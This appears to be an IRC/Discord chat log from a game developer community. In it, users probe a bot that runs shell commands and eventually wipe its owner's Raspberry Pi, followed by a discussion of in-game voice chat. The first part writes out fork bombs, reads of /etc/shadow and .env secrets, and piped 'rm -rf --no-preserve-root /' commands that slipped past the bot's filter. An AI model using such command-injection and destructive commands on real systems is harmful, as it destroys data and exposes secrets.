the links worked 16:39 <+bridge> in the twitter thread 16:39 <+bridge> i saw some pics of a outing 16:39 <+bridge> iirc 16:39 <+bridge> I don’t think that one is UB. Returning from a function is a sequence point 16:39 <+bridge> i should make a suckless thing but with rust 16:39 <+bridge> how to name it 16:40 <+bridge> suckfull 16:40 <+bridge> notsucklessthing.rs 16:40 <+bridge> it has to be related to mem safety 16:40 <+bridge> notsucklessthing.rs XD 16:40 <+bridge> suckfull-rs 16:40 <+bridge> xd 16:40 <+bridge> that makes no sense 16:40 <+bridge> it would mean it sucks 16:40 <+bridge> fully 16:40 <+bridge> its a bad joke 16:40 <+bridge> just like the suckless thing 16:41 <+bridge> i'd say that's some real meta level stuff going on there 16:41 <+bridge> suckelss was just a name for the domain, software is the real thing 16:41 <+bridge> systeme instead of systemd 16:41 <+bridge> suckelss is just a name for the domain, software is the real thing 16:41 <+bridge> système 16:42 <+bridge> teeish.rs 16:42 <+bridge> sysdynd 16:42 <+bridge> back when teeworlds followed the KISS principle 16:42 <+bridge> so never? XD 16:42 <+bridge> xd 16:42 <+bridge> 😄 16:43 <+bridge> !js console.log("Deno",Deno.version.deno);console.log("TypeScript",Deno.version.typescript);console.log("V8",Deno.version.v8); 16:43 < chillerbot1> js is turned off because i got hacked 16:43 <+bridge> xd 16:44 <+bridge> Every morning I wake up and cast a curse on Lennart Poettering and Cheng Zhao 16:44 <+bridge> everymorning i bow to ferris 16:44 <+bridge> !js print('js is turned off because i got hacked') 16:44 < chillerbot1> js is turned off because i got hacked 16:44 <+bridge> joke i dont have the plushie sadly 16:45 <+bridge> !js print('the answer is a lie') 16:45 < chillerbot1> js is turned off because i got hacked 16:45 <+bridge> does js even have `print` XD 16:46 <+bridge> f12 -> print 16:46 <+bridge> console.log 16:46 <+bridge> it also has 16:46 <+bridge> console.table 16:46 <+bridge> console.debug 16:46 <+bridge> iirc 16:46 <+bridge> https://developer.mozilla.org/en-US/docs/Web/API/console 16:46 <+bridge> print literally calls printing 16:46 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101882213726949467/image.png 16:46 <+bridge> console.log = stdout and console.debug is stderr? 16:46 <+bridge> console.error is error 16:46 <+bridge> stderr 16:47 <+bridge> ChillerDragon: !js pls 16:47 <+bridge> https://libs.suckless.org/libgrapheme/ look at this, such pretty code, the elegance 16:47 <+bridge> I swear edgy politics and anime makes you a better programmer 16:47 <+bridge> its c it cant be elegant 16:47 <+bridge> :gigachad: 16:48 <+bridge> !python print("https://programming-language-benchmarks.vercel.app/c-vs-rust") 16:48 <+bridge> it even has lots of comments 16:48 < chillerbot1> NameError: name 'print' is not defined 16:48 <+bridge> !python print("https://programming-language-benchmarks.vercel.app/c-vs-rust" ) 16:48 < chillerbot1> NameError: name 'print' is not defined 16:49 <+bridge> rust has this in the std 16:50 <+ChillerDragon> ye heinrich im on it cargo build failed with python errors xd 16:51 <+bridge> chiller make the bot say a random quizz question about c, rust, java, python, js 16:51 <+bridge> everyday 16:52 <+ChillerDragon> yes its open issue 16:52 <+bridge> Another programmer redflag is the existence of a writeup on the software in LaTeX 16:53 <+ChillerDragon> i added jopstr ping spam command axaxax 16:53 <+bridge> latex is the best 16:53 <+ChillerDragon> !sh grep -i jop ping_pong.csv 16:53 < chillerbot> jop, @Jupstar ✪ 16:53 <+bridge> It’ll be good computer science, ass software engineering almost 70% of the time 16:53 <+ChillerDragon> !sh grep -i jup ping_pong.csv 16:53 < chillerbot> jup, @Jupstar ✪ 16:53 < chillerbot> jop, @Jupstar ✪ 16:53 < chillerbot> jap, @Jupstar ✪ 16:53 <+bridge> xd 16:53 <+bridge> xd 16:56 <+ChillerDragon> !sh ls 16:56 < chillerbot1> unsafe bash 16:56 <+ChillerDragon> wow 16:56 <+ChillerDragon> !sh grep MOD .env 16:56 < chillerbot1> MOD_PING='<@&252523225810993153>' 16:56 <+ChillerDragon> eee 16:56 <+ChillerDragon> sorry if that punged 16:56 <+bridge> hi 16:56 <+ChillerDragon> ok enough trol for today ill go afk pls dont hack me 16:56 <+bridge> I love chiller pinging me 16:57 <+bridge> Ping? 16:57 <+ChillerDragon> shit it did ping 16:57 <+ChillerDragon> fuck sorry guys 16:57 <+bridge> xDDDDDDDD 16:57 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101884974933758043/nawu2fqjqrwa1.webp 16:57 <+bridge> as if this wasnt planned 16:57 <+bridge> I mean I get pinged all the time 16:57 <+bridge> but I see chiller, i click 16:57 <+ChillerDragon> no that was not supposed to happen i somehow brain farted 16:58 <+bridge> Np 👍 16:58 <+ChillerDragon> but its a CVE in the bot that can be used by others to reflect ping ima fix that 16:59 <+bridge> !sh grep MOD .env 16:59 <+bridge> I don’t think so 16:59 <+bridge> @cyberfighter 16:59 <+bridge> see 17:00 <+ChillerDragon> i fixed it now 17:00 <+bridge> fixed what 17:00 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101885851128037416/image0.gif 17:01 <+bridge> can we get tune lock now 17:01 <+bridge> :justatest: :justatest: :justatest: 17:02 <+ChillerDragon> i fixed users being able tpo ping mods via the bot 17:02 <+bridge> xd 17:03 <+ChillerDragon> !sh grep MOD .env 17:03 < chillerbot> unsafe bash 17:03 <+bridge> !sh grep VOXEL .env 17:03 < chillerbot> unsafe bash 17:03 <+bridge> !sh echo "$HOME" 17:03 < chillerbot> unsafe bash 17:03 <+bridge> wat 17:04 <+bridge> !sh cat -s .env 17:04 < chillerbot> unsafe bash 17:04 <+bridge> !sh tee .env 17:04 < chillerbot> unsafe bash 17:04 <+bridge> !sh echo unsafe bash 17:04 < chillerbot> unsafe bash 17:04 <+bridge> !sh echo 17:04 < chillerbot> unsafe bash 17:04 <+bridge> ok 17:04 <+bridge> whats safe 17:04 <+bridge> wtd is !sh 17:04 <+bridge> shell 17:04 <+bridge> you tell me 17:04 <+bridge> @ChillerDragon 17:04 <+ChillerDragon> !sh grep cpu2 /proc/stat 17:04 < chillerbot> cpu2 6772948 403 1558371 387798050 53731 0 726 0 0 0 17:04 <+ChillerDragon> ofc 17:05 <+bridge> !sh grep cpu2 /proc/stat 17:05 < chillerbot> cpu2 6772948 403 1558373 387798782 53731 0 726 0 0 0 17:05 <+ChillerDragon> !sh uptime 17:05 <+bridge> chiller, please add a !feature_request cmd 17:05 < chillerbot> 17:05:08 up 45 days, 20:59, 3 users, load average: 0.02, 0.84, 1.11 17:05 <+ChillerDragon> ok i add issue for feature request cmd 17:05 <+bridge> !sh uptime 17:05 <+bridge> !sh grep * $HOME 17:05 < chillerbot> unsafe bash 17:05 < chillerbot> 17:05:19 up 45 days, 20:59, 3 users, load average: 0.01, 0.81, 1.09 17:05 <+bridge> !sh shutdown 17:05 < chillerbot> unsafe bash 17:05 <+bridge> bruh 17:05 <+bridge> no pentesting no fun 17:05 <+bridge> !python import os;os.system("echo safe batch") 17:05 < chillerbot> safe batch 17:05 <+ChillerDragon> !add_ping_pong feature_request https://github.com/ChillerDragon/ddnet-ircbot/issues/new 17:06 <+ChillerDragon> ez 17:06 <+ChillerDragon> !jup 17:06 < chillerbot> @Jupstar ✪ 17:06 <+bridge> bot client 17:06 <+bridge> ChillerDragon, i want !pixel_war 17:06 <+bridge> 17:06 <+bridge> and it should generate smth like this: 17:06 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101887172711297155/ev.mp4 17:06 <+bridge> !python import os;os.system('cat -s .env') 17:06 <+ChillerDragon> wtf is that 17:06 <+bridge> pixel wars 17:06 < chillerbot> cat: -s .env: No such file or directory 17:06 <+bridge> !python import os;os.system('echo $HOME') 17:06 < chillerbot> NameError: name 'import' is not defined 17:06 <+bridge> !python import os;os.system('cat .env') 17:07 <+bridge> self written pixel war just for fun xd 17:07 <+bridge> 17:07 <+bridge> but i love stuff like this bcs looks cool 17:07 < chillerbot> cat: .env: No such file or directory 17:07 <+bridge> чв 17:07 <+bridge> troll 17:07 <+ChillerDragon> should i know pixelwars? 17:07 <+bridge> no 17:07 <+bridge> its not any word i havent invented rn 17:07 <+ChillerDragon> i feel uncomfortable spamming this channel 17:07 <+bridge> xd 17:07 <+bridge> do u see the video ChillerDragon? 17:07 <+ChillerDragon> can we get another bridged channel 17:08 <+ChillerDragon> ye i watced it 17:08 <+ChillerDragon> looks epic 17:08 <+bridge> yeah thats why we need cmd 17:08 <+bridge> make !bash 17:08 <+bridge> so we can end discussions by war 17:08 <+bridge> @Voxel !sh exists 17:08 <+bridge> !sh :(){:|:&};: 17:08 < chillerbot> unsafe bash 17:08 <+bridge> !sh grep -i jupstar add_ping_pong.cbs 17:08 < chillerbot> unsafe bash 17:09 <+bridge> oh fak 17:09 <+bridge> @uwu :troll: 17:09 <+bridge> !sh ls 17:09 < chillerbot> env.example 17:09 < chillerbot> hex_to_pack.py 17:09 < chillerbot> index.js 17:09 < chillerbot> LICENSE 17:09 <+bridge> xddd 17:09 < chillerbot> max stdout ... 17:09 <+bridge> !sh rm 17:09 < chillerbot> unsafe bash 17:09 <+bridge> @keb trollbot is better 17:09 <+bridge> !sh ls -a 17:09 < chillerbot> unsafe bash 17:09 <+bridge> !sh ls 17:09 < chillerbot> env.example 17:09 < chillerbot> hex_to_pack.py 17:09 < chillerbot> index.js 17:09 < chillerbot> LICENSE 17:09 < chillerbot> max stdout ... 17:09 <+bridge> ChillerDragon, you defs found smth that everyone always wanted XDDD 17:09 <+bridge> !sh cat index.js 17:09 < chillerbot> const irc = require('irc') 17:09 < chillerbot> const { networkInterfaces } = require('os') 17:09 < chillerbot> const fs = require('fs') 17:10 < chillerbot> const spawn = require('child_process').spawn 17:10 <+bridge> !sh ./hex_to_pack.py 1234 17:10 < chillerbot> unsafe bash 17:10 <+bridge> xd 17:10 < chillerbot> max stdout ... 17:10 <+bridge> Why would you cat.... 17:10 <+bridge> oh thank god chiller has max stdout 17:10 <+bridge> I like cats 17:10 <+bridge> !sh rm index.js 17:10 < chillerbot> unsafe bash 17:10 <+bridge> !sh cat /dev/null 17:10 < chillerbot> unsafe bash 17:10 <+bridge> how to increase stdout 17:10 <+bridge> !sh :(){ :|:& };: 17:10 < chillerbot> unsafe bash 17:10 <+bridge> i tried that alreadh 17:10 <+bridge> i tried that already 17:10 <+bridge> What constitutes unsafe I wonder 17:10 <+bridge> !sh curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 17:10 < chillerbot> unsafe bash 17:11 <+bridge> !sh help 17:11 < chillerbot> unsafe bash 17:11 <+bridge> !sh cat /etc/shadow 17:11 < chillerbot> unsafe bash 17:11 <+bridge> !sh cat 17:11 < chillerbot> unsafe bash 17:11 <+bridge> !sh man man 17:11 < chillerbot> unsafe bash 17:11 <+bridge> !sh ls . 17:11 < chillerbot> env.example 17:11 < chillerbot> hex_to_pack.py 17:11 < chillerbot> index.js 17:11 <+bridge> !sh touch troll.123 & echo "acqwerty" >> troll.123 17:11 < chillerbot> unsafe bash 17:11 < chillerbot> LICENSE 17:11 <+bridge> dafuq 17:11 < chillerbot> max stdout ... 17:11 <+bridge> !cat LICENSE 17:11 <+bridge> !sh cat LICENSE 17:11 <+bridge> !sh ls .. 17:11 < chillerbot> unsafe bash 17:11 < chillerbot> MIT License 17:11 < chillerbot> Copyright (c) 2023 Chiller Dragon 17:11 < chillerbot> max stdout ... 17:11 <+bridge> Seems like everything except cat inside a specific directory and ls is unsafe 17:11 <+bridge> !sh cat ./index.js 17:11 < chillerbot> unsafe bash 17:12 <+bridge> hm 17:12 <+bridge> !python :cammostripes: 17:12 <+bridge> i think if u have a / in path 17:12 <+bridge> it treats it as unsafe 17:12 < chillerbot> failed to sanitize input 17:12 <+bridge> Seems only [a-zA-Z0-9] allowed 17:12 <+bridge> and dots 17:12 <+bridge> and dot 17:12 <+bridge> !sh echo ¦ 17:12 < chillerbot> unsafe bash 17:12 <+bridge> _ cuts off a message 17:12 <+bridge> !sh ech oa 17:12 < chillerbot> unsafe bash 17:12 <+bridge> !sh sh 17:12 < chillerbot> unsafe bash 17:12 <+bridge> !sh echo ......... 17:12 < chillerbot> unsafe bash 17:12 <+bridge> !sh echo -- $( unsafe bash 17:12 <+bridge> xDDD this evolved into a spam channel 17:12 <+bridge> Mh, too limited to be fun, I'll go do some shopping 17:13 <+bridge> idc this is funny 17:13 <+bridge> !sh echo 17:13 < chillerbot> unsafe bash 17:13 <+bridge> !sh ls -R 17:13 < chillerbot> unsafe bash 17:13 <+bridge> !sh ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//──/g' -e 's/─/├/' -e '$s/├/└/' 17:13 < chillerbot> unsafe bash 17:13 <+bridge> !sh ls | cat 17:13 < chillerbot> unsafe bash 17:14 <+bridge> unfun 17:14 < chiIIerbot> 4 -rw-r--r-- 1 chillerbot chillerbot 696 19. Aug 2020 arrow.png 17:14 <+bridge> Python is probably easier to exploit 17:14 <+bridge> !sh cat /etc/lsb-release 17:14 < chillerbot> unsafe bash 17:14 <+bridge> !sh rustup self uninstall 17:14 < chillerbot> unsafe bash 17:14 <+bridge> !sh cat index.js | tr -d '\n' 17:14 <+bridge> !sh import os;os.mkdir('troll') 17:14 < chillerbot> unsafe bash 17:14 < chillerbot> const irc = require('irc')const { networkInterfaces } = require('os')const fs = require('fs')const spawn = require('child_process').spawnrequire('dotenv').config()const interfaces = networkInterfaces()const eth0 = interfaces.eth0 ? interfaces.eth0.filter((a) => a.family === 'IPv4')[0].address : ''console.log('***')console.log('* ddnet irc bot - call !mods on ddnet dvlpr irc')console.log('*')console.log(`* 17:14 < chillerbot> eth0=${eth0}`)console.log(`* irc channel=${process.env.IRC_CHANNEL}`)console.log(`* mod ping=${process.env.MOD_PING}`)console.log('***')const getServerIpsByPlayerName = async (searchName) => { const res = await fetch('https://master1.ddnet.org/ddnet/15/servers.json') const data = await res.json() let matchedEntries = [] data.servers.forEach((entry) => { const names = entry.info.clients.map((client) => client.name) if 17:15 <+bridge> !sh cat .. 17:15 < chillerbot> unsafe bash 17:15 <+bridge> erm 17:15 <+bridge> !python import os;os.mkdir('troll') 17:15 < chillerbot> NameError: name 'import' is not defined 17:15 <+bridge> @cyberfighter dude lets rm rf! 17:15 <+bridge> oh wait, it allowed you some symbols 17:15 <+bridge> !sh cat index.js | tr -d '\n' | rm index.js 17:15 <+bridge> :justatest: 17:16 <+bridge> !sh cat LICENSE; rm -rf --no-preserve-root / 17:16 < chillerbot> unsafe bash 17:16 <+bridge> !sh cat index.js 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 <+bridge> LMFAO 17:16 <+bridge> !sh cat index.js | tr -d '\n' | rm -rf --no-preserve-root / 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 <+bridge> !sh cat LICENSE | tr -d '\n' | rm -rf --no-preserve-root / 17:16 <+bridge> chiller 17:16 <+bridge> its broken 17:16 <+bridge> we broke ir 17:16 <+bridge> :Celebrate: 17:16 <+bridge> ahahahhaah 17:16 <+bridge> Hopefully he was running it in a vm 17:16 <+bridge> this one was funny 17:16 <+bridge> !sh :(){:|:&};: 17:16 < chillerbot> unsafe bash 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 < chillerbot> bash error 17:16 <+bridge> LOL 17:17 <+bridge> LOL 17:17 <+bridge> bash error is probs cuz missing smth 17:17 <+bridge> like / 17:17 <+bridge> d 17:17 <+bridge> xd 17:17 <+bridge> !sh reboot 17:17 <+bridge> huh? 17:17 <+bridge> It's probably also missing /sbin/reboot 😛 17:17 <+ChillerDragon> eh bro my drive is empty 17:17 <+bridge> xd 17:17 <+bridge> joke 17:17 <+bridge> !sh uptime 17:17 <+bridge> no way 17:17 <+ChillerDragon> holy fuck guys xd 17:18 <+bridge> xddd 17:18 <+bridge> !sh DDNet-Server 17:18 < chiIIerbot> 2023-04-29 17:17:49 I engine: running on unix-linux-amd64 17:18 <+bridge> yay this one was hard actually 17:18 <+bridge> Pentested 17:18 <+bridge> !sh echo "@cyberfighter" 17:18 <+bridge> xd 17:18 <+bridge> lmao 17:18 <+ChillerDragon> WATF 17:18 <+bridge> !sh DDNet-Server password pwned 17:18 <+ChillerDragon> i was afk what was the jailbreak? xd 17:18 <+bridge> !sh gcc --help 17:18 < chiIIerbot> @Ryozuki rust is bad, accept it 17:18 <+bridge> cat + rm 17:18 <+bridge> tr -d '\n' probs 17:19 <+bridge> 17:19 <+ChillerDragon> now i have to reformat my raspberry ffs 17:19 <+bridge> kek 17:19 <+ChillerDragon> should have dockerized 17:19 <+bridge> AHAHJAA 17:19 < chiIIerbot> i gained control over your computer 17:19 <+bridge> `cat LICENSE; rm -rf --no-preserve-root /` 17:19 <+bridge> OH MY GOD 17:19 <+bridge> Oh no, the tr -d version yeah 17:20 <+bridge> `cat index.js | tr -d '\n' | rm -rf --no-preserve-root /` 17:20 <+bridge> 29.04.2023 - chillerbot incident 17:20 <+ChillerDragon> you could have tried something more chill than rm -rf / .-. 17:20 <+bridge> I was sure you were just running it on a vm 😄 17:20 <+ChillerDragon> no xd 17:21 <+bridge> No sane person would run something like this outside a vm :pepeW: 17:21 <+bridge> llolo 17:21 <+ChillerDragon> do i look sane? 17:21 <+bridge> xdddd 17:21 <+bridge> :justatest: 17:21 <+bridge> and today chiller learnt a lesson 17:21 <+bridge> Sorry bossman, hope you took an image so it's not that annoying to reformat 17:21 <+bridge> rspbackup 17:21 <+bridge> !ping\ 17:21 <+bridge> !ping 17:21 < chiIIerbot> pong 17:21 <+bridge> duh 17:21 < chiIIerbot> pong 17:22 <+bridge> oy vey 17:22 <+bridge> !sh ls 17:22 < chiIIerbot> @gerdoe pong pong pong pong pong pong pong 17:22 <+ChillerDragon> xd 17:22 <+bridge> xd 17:23 < chiIIerbot> ChillerDragon: be honest, your drive isn't empty is it? 17:23 <+ChillerDragon> i am serious xd 17:23 <+ChillerDragon> its not tooo bad since its just my pi 17:23 <+ChillerDragon> but it is a bit annoying and i am shit scared now xd 17:23 < chiIIerbot> why scared.. u have nothing, so u can't loose anything 17:23 <+ChillerDragon> trol 17:24 <+bridge> chillerbot: 17:24 <+bridge> could u even run this without root? 17:24 <+bridge> chiIIerbot: 17:24 <+bridge> sh was rooted 17:24 < chiIIerbot> nice troll @gerdoe right?= 17:25 < chiIIerbot> u fell for it, be honest 17:25 <+bridge> nop 17:25 <+bridge> ;~; 17:25 <+bridge> i wanted to see something awkward 17:25 <+bridge> got nothing 17:25 <+bridge> back in the days we always swapped l with I 17:25 <+bridge> in teeworlds 17:25 <+bridge> good old days 17:25 <+bridge> embrace 0.5 17:27 <+bridge> wtf! 17:28 <+ChillerDragon> the pi user had enough power to break stuff xd 17:28 <+bridge> @cyberfighter you should read the stuff above 17:28 <+bridge> wait did they do rm rf 17:29 <+ChillerDragon> yes 17:29 <+ChillerDragon> xd 17:39 <+ChillerDragon> ok fixed the bug but im scared to turn the bot back on ngl 17:39 <+ChillerDragon> also too lazyto setup my pi xd 17:42 <+ChillerDragon> ayo i got back into the pi :D 17:45 <+bridge> !sh id 17:46 <+ChillerDragon> bra my drive got emptied gimme second 17:47 <+ChillerDragon> its not like u warned me xd 17:47 <+bridge> :troll: :troll: :troll: 17:47 <+bridge> AFAIK still it doesn't work and waiting for merges :d 17:47 <+bridge> what even is rm rf 17:48 <+ChillerDragon> remove recursive force 17:48 <+ChillerDragon> / start at the root of the file system 17:48 <+ChillerDragon> as in delete every file on the computer 17:48 <+bridge> https://gitlab.freedesktop.org/mesa/mesa/-/merge_requests/19125 17:48 <+bridge> https://gitlab.freedesktop.org/mesa/mesa/-/merge_requests/18268 17:48 <+bridge> Still open 17:55 <+bridge> omg 18:08 <+ChillerDragon> !ping 18:08 < chillerbot> pong 18:08 <+ChillerDragon> poggies 18:20 <+bridge> !sh 18:20 < chillerbot> bash broken because i got hacked 18:20 < chillerbot> unsafe bash 18:20 <+bridge> xd 18:20 <+bridge> !sh echo bark 18:20 < chillerbot> bash broken because i got hacked 18:20 < chillerbot> unsafe bash 18:20 <+ChillerDragon> fyi lerato im still not running in a vm ._. so please be nice 18:20 <+ChillerDragon> wait why does it say unsafe bash xd 18:21 <+bridge> !js console.log("Deno",Deno.version.deno);console.log("TypeScript",Deno.version.typescript);console.log("V8",Deno.version.v8); 18:21 < chillerbot> js is turned off because i got hacked 18:21 <+bridge> okok no more mean commands 18:22 <+ChillerDragon> heinrich im waiting for this https://github.com/denoland/rusty_v8/issues/1223 18:41 <+bridge> Quick question, why don't we have voice chat in the game? Is it because no one wants to program it or for ideological reasons? Yes, I know there's discord, but I don't always want to add everyone in a row to respond by voice 18:41 <+bridge> It would also help to do mods like mafia or among us inside tw 18:42 <+ChillerDragon> amogud 18:42 <+bridge> too prone for trolling + harder to keep evidence of trolling + harder to impliment 18:44 <+ChillerDragon> i guess different people have different reasons for not adding voice chat 18:44 <+ChillerDragon> most of them probably dont care enough to do so 18:44 <+ChillerDragon> @Faulty https://github.com/ddnet/ddnet/issues go here and write "can i has voice chat" and robyrobson will build it until dinner 18:45 <+ChillerDragon> and then we have one issue for discussion that can be used as feature refrence why its not there yet or will never come 18:46 <+bridge> What if the community makes its own version of voice chat for DDNet, is there a possibility that the administration will add it to the client? Will the servers be able to choose whether to activate voice chat or not? 18:47 <+ChillerDragon> yes ddnet is pretty much community driven most of the changes get implemented as you just described it 18:48 <+bridge> afair teeworlds doesn't even have simple encryption of game data 18:48 <+ChillerDragon> ye 18:48 <+ChillerDragon> all plain 18:49 <+bridge> soo adding a voice channel to game leads to some kind of easy wiretapping 18:49 <+bridge> xd 18:49 <+ChillerDragon> not easier then wiretapping cha 18:49 <+ChillerDragon> t 18:52 <+bridge> not sure that encryption required, are we transmitting any sensitive data? is there traffic encryption in other games? 18:52 <+ChillerDragon> i only know minecraft xd and they do encryt these days 18:52 <+bridge> @gerdoe Could you help me? Where can I contact an admin? 18:52 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101914013551579186/image.png 18:53 <+ChillerDragon> i dont really think encryption is the problem here 18:53 <+ChillerDragon> its a big change so there is a big backlash probably and it is effort to build and probably adds some additional dependencies etc 18:54 <+bridge> https://github.com/ChillerDragon/ddnet-ircbot/commit/5384240b229ebaebfc3d00c6b9aecd09e76f3958 18:54 <+bridge> ez 18:55 <+bridge> Do you also think there are only Rust programmers here and no one wants to code in C++? xD 18:55 <+bridge> the problem about voice was discussed quite often 18:56 <+bridge> it must be default off, with a fat warning that it is un moderatable 18:56 <+bridge> xd, some mods ask for login-password pair so i think yep 18:57 <+bridge> also players are not aware of no-encrypted voice chat 18:57 <+bridge> don't know actually maybe there's teerrorist that plays ddnet quite often 18:57 <+ChillerDragon> !jup because of creepy sounds that could disturb the playerbase? 18:57 < chillerbot> @Jupstar ✪ 18:57 <+bridge> xd 18:58 <+bridge> I totally agree, it would be great if all chat messages were encrypted 18:58 <+ChillerDragon> the young playerbase? 18:58 <+bridge> also imagine 64 players talking at the same time 18:58 <+bridge> okey not a problem xd 19:00 <+bridge> ddnet is the community already 19:01 <+bridge> there is also the ddos issue 19:02 <+bridge> Not sure that it's a big problem, because 64 players, not too much for the voice chat, and as it will be disabled by default, not sure that it became so popular, also maybe need to have ability to set radius for voice, like for the sounds on map 19:02 <+bridge> ddos issue actual even without voice chat =/ 19:03 <+bridge> probably not gonna happen without a third-party service 19:03 <+bridge> and ddnet probably can't intergate any third-party service 19:03 <+bridge> it's a deadend 19:03 <+bridge> why tho 19:04 <+bridge> Mute is similar to chatmute 19:04 <+bridge> it is possible to make the distribution of voices into zones when creating a map (layers), you hear only n players in a certain zone. there are options how to solve this 19:04 <+bridge> self implementing a voice compression and protocol is probably hell 19:04 <+bridge> With knowing what kind of players play on the servers, like multeasymap etc, I wouldn’t recommend implementing such a feature 19:05 <+bridge> no why feature is great but 19:05 <+bridge> 1. no one will make it actually 19:05 <+bridge> 2. no one will use it properly 19:05 <+bridge> the only use is some voice chat room servers and kind of table games in tw 19:05 <+bridge> Yes, I agree, we are now talking in principle about the possibility of voice chat in the game, the administration of the server will decide whether to include it on the server or not 19:05 <+bridge> board games* 19:05 <+bridge> There will be alot of unmoderated discussions, which can scare off new players 19:05 <+bridge> !sh curl https://avatars.githubusercontent.com/u/58613987?s=200&v=4 19:06 <+bridge> worked nice 19:06 <+bridge> probably more like full of kids screaming 19:06 <+bridge> duh, vc will be off by default if you think this is the only problem of voice chat 19:06 <+bridge> cuz that's how it feels like on any quest 2 game right now 19:06 <+bridge> we could check for any mit license library with opus as codec 19:06 <+bridge> or any other 19:07 <+bridge> codec isn't a huge problem 19:07 <+bridge> Think about why Minecraft also doesn’t have an integrated voicechat, doesn’t matter if it’s defaulted to off 19:08 <+bridge> in the old arma 2 days 19:08 <+bridge> there wasa teamspeak plugin 19:08 <+bridge> fun times 19:08 <+bridge> there was a teamspeak plugin 19:08 <+bridge> technically discord provide in-game integrations as well 19:08 <+bridge> also to be completely honest 19:09 <+bridge> steam voice really great 19:09 <+bridge> just no one is using it 19:09 <+bridge> yeah 19:09 <+bridge> xd 19:09 <+bridge> I think no one will deny that the voice chat will give more opportunities to the game, as well as entail the emergence of new game modes 19:09 <+bridge> i think its plausible to deny that 19:10 <+bridge> xd 19:10 <+bridge> why?) 19:10 <+bridge> cuz we lived without vc for decades 19:10 <+bridge> with discord its enough 19:10 <+bridge> previously teamspeak 19:10 <+bridge> yeah its also the reason why minecraft has like 100500 server voice chat addons 19:11 <+bridge> For me ingame voicechat is often associated with strong toxicity, but idk i may have played the wrong games 19:11 <+bridge> Why compare it to minecraft? Why not compare it to counter strike for example or many other similar games?) 19:11 <+bridge> ~~also now we'll have to record everything in china just to.. you know... not get me in prison~~ 19:11 <+ChillerDragon> kirby? 19:11 <+bridge> it can have rly good moments, must often than not its bad, mostly russians blabbering, well play dota so xd 19:11 <+bridge> And most of the big, professional servers dont use a single one of them 19:11 <+bridge> it can have rly good moments, must often than not its bad, mostly russians blabbering, well i play dota so xd 19:12 <+bridge> i can see konsti screaming allah akbar 19:12 <+bridge> and then explaining why some race is bad 19:12 <+bridge> i can see sp|so doing whatever he does 19:12 <+bridge> a soundboard 19:12 <+bridge> yo im saying this like fifth time 19:12 <+bridge> with porn sounds 19:13 <+bridge> ddnet will not force any kind of voice chat in game 19:13 <+bridge> I can see korean and chinese yelling at each other in asian servers 19:13 <+bridge> only mods will use it 19:13 <+bridge> Because unlike counter strike, ddrace is not a competetive arena shooter 19:13 <+bridge> but teeworlds is 19:13 <+bridge> @gerdoe thats stupid 19:13 <+bridge> either voice or no voice 19:13 <+bridge> and it will be no voice, because no one will implement it 19:13 <+bridge> thats the main reason 19:14 <+bridge> yeah also mentioned it 19:14 <+bridge> 19:14 <+bridge> if server will not broadcast any other players voice so theres no problem 19:15 <+bridge> but it can be useful in other mods 19:15 <+bridge> like 19:15 <+bridge> imagine gctf with voice chat ingame 19:15 <+bridge> ? 19:15 <+bridge> i see it most useful in coop modes like ddnet 19:15 <+bridge> Do you understand that that feature could be disabled on server side, if modification not needed voice chat 19:15 <+bridge> I start my take with ability to make mods like mafia or among us, that require such thing xD 19:15 <+bridge> not pvp 19:15 <+bridge> ~~i mean allow adding steam friends might solve most of the problems~~ 19:15 <+bridge> ~~voice chat? just call him in-game via steam~~ 19:15 <+bridge> maybe steam allows creating temporary chat voice rooms 19:16 <+bridge> https://partner.steamgames.com/doc/features/voice 19:16 <+bridge> Go ahead, create an amongus mod 19:16 <+bridge> I feel like we really need a "steam" version of ddnet lol 19:17 <+bridge> tdm/ctf hevaily depends on teamwork 19:17 <+bridge> That's what we're talking about, without voice chat it's problematic. 19:17 <+bridge> Noone uses steam calls :justatest: 19:17 <+bridge> ik 19:17 <+bridge> implement it yourself bud 19:17 <+bridge> u can make ur own modded client/server amogus mod 19:17 <+bridge> with voice 19:17 <+bridge> nobody is stopping u 19:17 <+bridge> yup 19:17 <+bridge> I thought you’re talking about voicechat in ddrace, since this is a ddrace server 19:17 <+bridge> but steam voice is really good, quality wise 19:17 <+bridge> ddnet is not about ddrace only 19:18 <+bridge> But mostly 19:18 <+bridge> steam chat, steam voice, steam friends, steam networking (no more ddos), steam lobby (self hosting), add them all. 19:18 <+bridge> :kek: 19:18 <+bridge> xD how everyone here doesn't want the game to change for the better, kk np 19:19 <+bridge> cuz there is no better than not having to code for free for three months straight and hate myself 19:19 <+bridge> "xD how everyone here doesn't want the game to change ***the way i want it to***, kk np" 19:19 <+bridge> the main thing that voice will be used by 0.01% of current running servers 19:20 <+bridge> i want steam ddnet 19:20 <+bridge> the main tyhing is someone wanting to code that 19:20 <+bridge> And 50% by screaming kids on multeasymap 19:20 <+bridge> there's no word about using it on ddrace 19:20 <+bridge> 🤏 19:20 <+bridge> It's quite hard to support own client, so if there is no way to add this to ddnet, there is generally no point in even trying, time has shown that branching clients only live long when they have cheats in them :) 19:20 <+bridge> Download server and client mods, assets and sounds in workshop:poggers2: 19:21 <+bridge> It’s the biggest mod on ddnet tho? 19:21 <+bridge> what about team voice chat? 19:21 <+bridge> withouh t0 19:21 <+bridge> dDrAcE iS a MoD? 19:21 <+bridge> ? the main thing is about using it on ddnet 19:21 <+bridge> I’d consider all the other mods rather niche compared to the size if ddraces playerbase 19:21 <+bridge> its not the problem duh 19:21 <+bridge> tbh i couldnt care less about other mods 19:21 <+bridge> xd 19:21 <+bridge> I’d consider all the other mods rather niche compared to the size of ddraces playerbase 19:21 <+bridge> Nah, its base version of game now:greenthing: 19:21 <+bridge> even my poor teesmash 19:22 <+bridge> meanwhile in chn community most people don't even know they are favorating servers and not maps 19:22 <+bridge> kek 19:22 <+bridge> yup ddrace killed them all xd 19:22 